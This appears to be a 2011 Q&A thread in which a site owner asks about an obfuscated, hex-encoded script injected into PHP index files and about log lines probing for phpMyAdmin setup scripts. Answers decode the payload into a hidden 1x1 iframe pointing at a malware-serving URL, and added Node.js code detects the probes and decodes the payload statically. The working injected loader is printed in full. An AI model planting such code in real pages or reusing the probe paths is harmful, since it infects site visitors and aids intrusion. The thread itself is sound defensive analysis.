Is this a possible hack?

Time: 2011-07-19 23:46:50

Tags: javascript

A few days ago the Q&A section of my website went down, so I took the index offline, since I found the error was related to a syntax error. So I removed it and let it die. But when I opened it, I found:

<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f616d65726963616e6d6f62696c652e63612f666f72756d2e7068703f74703d36373565616665633433316231663732222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>httpdocs/');<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f616d65726963616e6d6f62696c652e63612f666f72756d2e7068703f74703d36373565616665633433316231663732222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>

I later found it on several PHP sites (for example WordPress' index), and what I would like to know is whether anyone knows where it comes from and what its purpose is.

I also found this in the logs, which looks suspicious:

87.106.166.95 - - [19/Jul/2011:00:03:14 +0400] "GET //typo3/phpmyadmin/scripts/setup.php HTTP/1.1" 301 552 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:15 +0400] "GET //phpadmin/scripts/setup.php HTTP/1.1" 301 544 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:16 +0400] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 301 546 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:16 +0400] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 474 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:17 +0400] "GET //phpmyadmin1/scripts/setup.php HTTP/1.1" 301 547 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:18 +0400] "GET //phpmyadmin2/scripts/setup.php HTTP/1.1" 301 547 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:18 +0400] "GET //pma/scripts/setup.php HTTP/1.1" 301 539 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:19 +0400] "GET //web/phpMyAdmin/scripts/setup.php     HTTP/1.1" 301 550 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:20 +0400] "GET //xampp/phpmyadmin/scripts/setup.php HTTP/1.1" 301 552 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:20 +0400] "GET //web/scripts/setup.php HTTP/1.1" 301 539 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:21 +0400] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 301 548 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:22 +0400] "GET //websql/scripts/setup.php HTTP/1.1" 301 542 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:22 +0400] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 474 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:22 +0400] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 301 546 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:23 +0400] "GET //phpMyAdmin-2/scripts/setup.php HTTP/1.1" 301 548 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:24 +0400] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 301 548 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:24 +0400] "GET //sqlmanager/scripts/setup.php HTTP/1.1" 301 546 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:25 +0400] "GET //mysqlmanager/scripts/setup.php HTTP/1.1" 301 548 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:26 +0400] "GET //p/m/a/scripts/setup.php HTTP/1.1" 301 541 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:26 +0400] "GET //PMA2005/scripts/setup.php HTTP/1.1" 301 543 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:27 +0400] "GET //pma2005/scripts/setup.php HTTP/1.1" 301 543 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:28 +0400] "GET //phpmanager/scripts/setup.php HTTP/1.1" 301 546 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:28 +0400] "GET //php-myadmin/scripts/setup.php HTTP/1.1" 301 547 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:29 +0400] "GET //phpmy-admin/scripts/setup.php HTTP/1.1" 301 547 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:30 +0400] "GET //webadmin/scripts/setup.php HTTP/1.1" 301 544 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:30 +0400] "GET //sqlweb/scripts/setup.php HTTP/1.1" 301 542 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:31 +0400] "GET //websql/scripts/setup.php HTTP/1.1" 301 542 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:32 +0400] "GET //webdb/scripts/setup.php HTTP/1.1" 301 541 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:32 +0400] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 301 546 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:33 +0400] "GET //mysql-admin/scripts/setup.php HTTP/1.1" 301 547 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:33 +0400] "GET //databaseadmin/scripts/setup.php HTTP/1.1" 301 549 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:34 +0400] "GET //admm/scripts/setup.php HTTP/1.1" 301 540 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:35 +0400] "GET //admn/scripts/setup.php HTTP/1.1" 301 540 "-" "-"
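The log excerpt above shows one IP walking through dozens of phpMyAdmin-style paths in a few seconds with an empty User-Agent. As an added example (not part of the original question or any answer), the Node.js script below parses Apache combined-log lines and flags any client that probes several distinct `.../scripts/setup.php` paths; the embedded sample is a constructed subset of the lines quoted above plus one benign request, and the threshold of 5 distinct paths is an assumed tuning value.

```javascript
// Added example: detect a setup.php probing burst in Apache combined-log lines.
// SAMPLE_LOG is constructed from the question's log excerpt plus one benign line;
// the threshold (5 distinct probed paths) is an assumption, tune it for your site.
const SAMPLE_LOG = `87.106.166.95 - - [19/Jul/2011:00:03:14 +0400] "GET //typo3/phpmyadmin/scripts/setup.php HTTP/1.1" 301 552 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:15 +0400] "GET //phpadmin/scripts/setup.php HTTP/1.1" 301 544 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:16 +0400] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 301 546 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:16 +0400] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 474 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:18 +0400] "GET //pma/scripts/setup.php HTTP/1.1" 301 539 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:20 +0400] "GET //xampp/phpmyadmin/scripts/setup.php HTTP/1.1" 301 552 "-" "-"
10.0.0.7 - - [19/Jul/2011:00:05:01 +0400] "GET /index.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"`;

// Apache "combined" format: ip ident user [time] "method path proto" status size "referer" "ua"
const LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/;

function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null; // malformed or truncated line: skip rather than guess
  return { ip: m[1], ts: m[2], method: m[3], path: m[4], status: Number(m[5]), referer: m[6], ua: m[7] };
}

// Heuristic: one IP requesting many different paths that all end in /scripts/setup.php
// is scanning for phpMyAdmin setup scripts; an empty ("-") User-Agent on every hit
// is a second weak signal that the client is a bot rather than a browser.
function findSetupProbes(logText, threshold = 5) {
  const byIp = new Map();
  for (const line of logText.split("\n")) {
    const rec = parseLine(line.trim());
    if (!rec || !/\/scripts\/setup\.php$/i.test(rec.path)) continue;
    if (!byIp.has(rec.ip)) byIp.set(rec.ip, { paths: new Set(), hits: 0, emptyUa: 0 });
    const e = byIp.get(rec.ip);
    e.paths.add(rec.path.toLowerCase()); // phpMyAdmin vs phpmyadmin count once
    e.hits += 1;
    if (rec.ua === "-") e.emptyUa += 1;
  }
  const alerts = [];
  for (const [ip, e] of byIp) {
    if (e.paths.size >= threshold) {
      alerts.push({ ip, hits: e.hits, distinctPaths: e.paths.size, emptyUserAgent: e.emptyUa === e.hits });
    }
  }
  return alerts;
}

console.log(JSON.stringify(findSetupProbes(SAMPLE_LOG), null, 2));
```

The 301/404 responses in the sample show the probes never reached a real setup.php, so on their own they are not evidence of how the site was compromised; the heuristic is for spotting the scanner, not for attributing the injection.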

5 answers:

Answer 0 (score: 5)

Yes, this looks like a common way of obfuscating malicious code after your site has been hacked. It can do any number of things, and is usually linked to a central server so its behaviour can be modified later.

To find out what this code does, we just need to run it with eval replaced by console.log. This prints out

document.write('<iframe src="http://americanmobile.ca/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>')

The site's URL and contents are meant to disguise its purpose. It currently serves a further obfuscated page. I expanded the code here. It appears to check your browser and plugin versions in order to target the visitor with a virus.

There are a lot of bots crawling the internet looking for vulnerable software versions and hacking them automatically. Trying to track them down is usually neither simple nor productive; just focus on being more secure next time.
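The answers above recover the payload by swapping eval for console.log, which still runs the attacker's decoder loop in a browser. As an added example (not code from the original question or any answer), the script below performs the same two-hex-digits-to-one-character decoding statically in Node.js, never executes the result, and pulls the injected iframe src out of the decoded text; the hex string is the one quoted in the question.

```javascript
// Added example: decode the hex payload from the injected script without eval.
// HEX_PAYLOAD is the string quoted in the question; nothing here executes it.
const HEX_PAYLOAD = "646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f616d65726963616e6d6f62696c652e63612f666f72756d2e7068703f74703d36373565616665633433316231663732222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";

// Mirror the malicious loop's decoding step (parseInt of each hex pair), but
// validate the input first so a truncated or tampered string fails loudly.
function hexToString(hex) {
  if (hex.length % 2 !== 0 || /[^0-9a-f]/i.test(hex)) {
    throw new Error("payload is not a clean even-length hex string");
  }
  let out = "";
  for (let i = 0; i < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16));
  }
  return out;
}

// Extract iframe src attributes with a regex over plain text: no DOM, no execution.
function extractIframeSources(decoded) {
  const sources = [];
  const re = /<iframe\b[^>]*\bsrc=["']([^"']+)["']/gi;
  let m;
  while ((m = re.exec(decoded)) !== null) sources.push(m[1]);
  return sources;
}

// Summarise what the payload would do if it ran: the decoded source, every
// iframe destination it injects, and whether it writes into the page via document.write.
function analysePayload(hex) {
  const decoded = hexToString(hex);
  return {
    decoded,
    iframes: extractIframeSources(decoded),
    usesDocumentWrite: /document\.write\s*\(/.test(decoded),
  };
}

console.log(analysePayload(HEX_PAYLOAD));
```

The iframe is 1x1 with no border, so a visitor would never see it; the decoded URL is what to block and to search the rest of the codebase for.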

Answer 1 (score: 0)

It comes from a hacker.

Its purpose is to hack you.

Remove it, and upgrade your defences.

Answer 2 (score: 0)

Yes, someone got access and inserted it. It encrypts the javascript that modifies the page. The easy way to find out what is actually going on is to replace eval() with console.log() or even alert() - that will give you the code.

I have done that, and this is what the code adds to the page:

<iframe src="http://americanmobile.ca/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>

Answer 3 (score: 0)

This is code injected into these sites through vulnerabilities in wordpress, plugins, or other applications running on the server.

When deobfuscated, the code produces:

document.write('<iframe src="http://xxx/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>')

(I have removed the domain name to be safe ;-))

Answer 4 (score: 0)

If you change eval to console.log, you get

document.write('<iframe src="http://americanmobile.ca/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>')

That forum post has now been removed, so it doesn't actually do anything any more, but yes, you've been hacked.